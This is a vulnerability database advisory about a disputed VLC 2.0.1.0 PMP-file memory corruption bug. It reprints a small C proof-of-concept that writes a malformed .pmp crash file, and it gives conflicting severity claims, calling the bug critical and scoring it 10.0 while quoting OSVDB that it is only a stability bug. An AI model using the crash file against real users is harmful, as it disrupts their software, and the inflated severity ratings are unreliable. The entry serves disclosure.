VDB-11651 · OSVDB 101469 · GCVE-100-11651

VideoLAN VLC Media Player 2.0.1.0 PMP File memory corruption ⚔ [Disputed]

CVSS Meta Temp Score
CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.
Current Exploit Price (≈)
Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.
CTI Interest Score
Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.
9.1$0-$5k0.00

Summaryinfo

A vulnerability has been found in VideoLAN VLC Media Player 2.0.1.0 and classified as problematic. This affects an unknown part of the component PMP File Handler. The manipulation leads to memory corruption. The attack can be initiated remotely. Additionally, an exploit exists. The presence of this vulnerability remains uncertain at this time.

Detailsinfo

A vulnerability was found in VideoLAN VLC Media Player 2.0.1.0 (Multimedia Player Software) and classified as critical. This issue affects an unknown part of the component PMP File Handler. The manipulation with an unknown input leads to a memory corruption vulnerability. Using CWE to declare the problem leads to CWE-119. The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. Impacted is confidentiality, integrity, and availability.

The bug was discovered 03/15/2012. The weakness was released 03/15/2012 by Dan Fosco as vlc8.txt as not defined advisory (Website) via VLC v. 2.0.1.0 .pmp Memory Corruption. It is possible to read the advisory at dfcode.org. The vendor was not involved in the public release. The exploitation is known to be difficult. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. Technical details are unknown but a public exploit is available. OSVDB notes: "Based on the provided details and additional cursory testing, there is, however, no evidence to support the claims of memory corruption and the possibility of code execution. Instead, the issue is simply considered a stability bug, causing this entry to be flagged as 'Myth/Fake'."

A public exploit has been developed by Dan Fosco in ANSI C. The exploit is available at dfcode.org. It is declared as proof-of-concept. The real existence of this vulnerability is still doubted at the moment. The code used by the exploit is:

#include <stdio.h>

int main()
{
   FILE *f;
   int i;
   f = fopen("dos.pmp", "w");
   fputs("\x70\x6d\x70\x6d\x01", f);
   for(i = 0; i < 9; i++)
   {
      fputc('\x00', f);
   }
   for(i = 0; i < 41; i++)
   {
      fputc('\x41', f);
   }
   fclose(f);
   return 0;
}

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

The vulnerability is also documented in the vulnerability database at OSVDB (101469†). Entries connected to this vulnerability are available at VDB-11652 and VDB-11650. Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Productinfo

Type

Vendor

Name

Version

License

Website

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB Vector: 🔍
VulDB Reliability: 🔍

CVSSv3info

VulDB Meta Base Score: 10.0
VulDB Meta Temp Score: 9.1

VulDB Base Score: 10.0
VulDB Temp Score: 9.1
VulDB Vector: 🔍
VulDB Reliability: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexityAuthenticationConfidentialityIntegrityAvailability
UnlockUnlockUnlockUnlockUnlockUnlock
UnlockUnlockUnlockUnlockUnlockUnlock
UnlockUnlockUnlockUnlockUnlockUnlock

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍

Exploitinginfo

Class: Memory corruption
CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍

Physical: No
Local: No
Remote: Yes

Availability: 🔍
Access: Public
Status: Proof-of-Concept
Author: Dan Fosco
Programming Language: 🔍
Download: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍

0-DayUnlockUnlockUnlockUnlock
TodayUnlockUnlockUnlockUnlock

Threat Intelligenceinfo

Interest: 🔍
Active Actors: 🔍
Active APT Groups: 🔍

Countermeasuresinfo

Recommended: no mitigation known
Status: 🔍

0-Day Time: 🔍

Timelineinfo

03/15/2012 🔍
03/15/2012 +0 days 🔍
12/28/2013 +653 days 🔍
05/06/2019 +1955 days 🔍

Sourcesinfo

Vendor: videolan.org

Advisory: vlc8.txt
Researcher: Dan Fosco
Status: Not defined
Disputed: 🔍

GCVE (VulDB): GCVE-100-11651
OSVDB: 101469

scip Labs: https://www.scip.ch/en/?labs.20161013
See also: 🔍

Entryinfo

Created: 12/28/2013 14:49
Updated: 05/06/2019 07:09
Changes: 12/28/2013 14:49 (54), 05/06/2019 07:09 (2)
Complete: 🔍
Cache ID: 216::103

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Discussion

No comments yet. Languages: en.

Please log in to comment.

Interested in the pricing of exploits?

See the underground prices here!